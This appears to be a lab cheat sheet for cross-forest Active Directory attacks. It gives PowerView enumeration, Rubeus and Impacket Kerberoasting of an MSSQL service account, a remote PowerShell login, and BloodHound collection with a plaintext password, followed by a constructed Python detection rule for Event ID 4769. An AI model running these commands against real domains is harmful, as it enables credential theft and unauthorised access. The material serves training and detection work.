Trust Relationships - Cross-Forest
1. Enumerate Accounts with Service Principal Names (SPNs)
Command:
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
Description: PowerView tool used to enumerate accounts with associated SPNs.
2. Enumerate MSSQL Service Account
Command:
Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof
Description: PowerView tool used to enumerate the mssqlsvc account.
3. Perform Kerberoasting Attack with Rubeus
Command:
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
Description: Uses Rubeus to perform a Kerberoasting attack against a target Windows domain.
4. Enumerate Foreign Group Members
Command:
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
Description: PowerView tool used to enumerate groups containing users from outside the domain.
5. Establish Remote PowerShell Session
Command:
Enter-PSSession -ComputerName ACADEMY-EADC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
Description: PowerShell cmdlet used to connect remotely to a target Windows system.
6. Request TGS Ticket for Kerberoasting
Command:
GetUserSPNs.py -request -targetdomain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Description: Impacket tool used to request a TGS ticket for an account in the target Windows domain.
7. Run BloodHound Enumeration
Command:
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EADC01 -c All -u forend -p Klmcargo2
Description: Runs the Python implementation of BloodHound to map Active Directory relationships.
8. Compress Files for BloodHound GUI Upload
Command:
zip -r ilfreight_bh.zip *.json
Description: Compresses multiple JSON files into a single .zip file for upload into the BloodHound GUI.
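Detection note for items 3 and 6 (an added example, not part of the original cheat sheet or of any tool listed above): a domain controller in FREIGHTLOGISTICS.LOCAL records each service ticket request as Event ID 4769, so a request for mssqlsvc that comes from an INLANEFREIGHT.LOCAL account with RC4 encryption stands out. The records below are constructed, use a simplified subset of the 4769 fields, and the account name sqladmin and the IP addresses are assumptions.

```python
"""Flag possible cross-forest Kerberoasting in Event ID 4769 records."""

LOCAL_REALM = "FREIGHTLOGISTICS.LOCAL"   # forest whose DC produced the log
RC4_HMAC = 0x17                          # RC4-HMAC ticket encryption type

# Constructed sample records (simplified field subset, not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "wley@INLANEFREIGHT.LOCAL",
     "ServiceName": "mssqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "192.0.2.10"},
    {"EventID": 4769, "TargetUserName": "wley@INLANEFREIGHT.LOCAL",
     "ServiceName": "ACADEMY-EADC03$", "TicketEncryptionType": "0x12", "IpAddress": "192.0.2.10"},
    {"EventID": 4769, "TargetUserName": "sqladmin@FREIGHTLOGISTICS.LOCAL",
     "ServiceName": "mssqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "192.0.2.20"},
    {"EventID": 4769, "TargetUserName": "forend@INLANEFREIGHT.LOCAL",
     "ServiceName": "mssqlsvc", "TicketEncryptionType": "0x12", "IpAddress": "192.0.2.11"},
    {"EventID": 4769, "TargetUserName": "forend@INLANEFREIGHT.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "192.0.2.11"},
]


def requester_realm(event):
    """Return the requesting account's realm, upper-cased ('' if absent)."""
    _, sep, realm = event.get("TargetUserName", "").partition("@")
    return (realm if sep else event.get("TargetDomainName", "")).upper()


def is_cross_forest_rc4_request(event, local_realm=LOCAL_REALM):
    """True for an RC4 ticket to a user-account service requested from another realm."""
    if event.get("EventID") != 4769:
        return False
    service = event.get("ServiceName", "")
    if service.endswith("$") or service.lower() == "krbtgt":
        return False  # machine accounts and krbtgt are out of scope for this rule
    if int(event.get("TicketEncryptionType", "0x0"), 16) != RC4_HMAC:
        return False
    # A missing realm ('') also differs from the local realm and is kept for review.
    return requester_realm(event) != local_realm.upper()


def find_suspects(events):
    """Return the events that match the cross-forest RC4 rule."""
    return [e for e in events if is_cross_forest_rc4_request(e)]


if __name__ == "__main__":
    for e in find_suspects(SAMPLE_EVENTS):
        print(e["TargetUserName"], "->", e["ServiceName"], "from", e["IpAddress"])
```

Requests that negotiate AES (0x12) are not matched by this rule, so it works best alongside a baseline of which foreign accounts normally request tickets for each service.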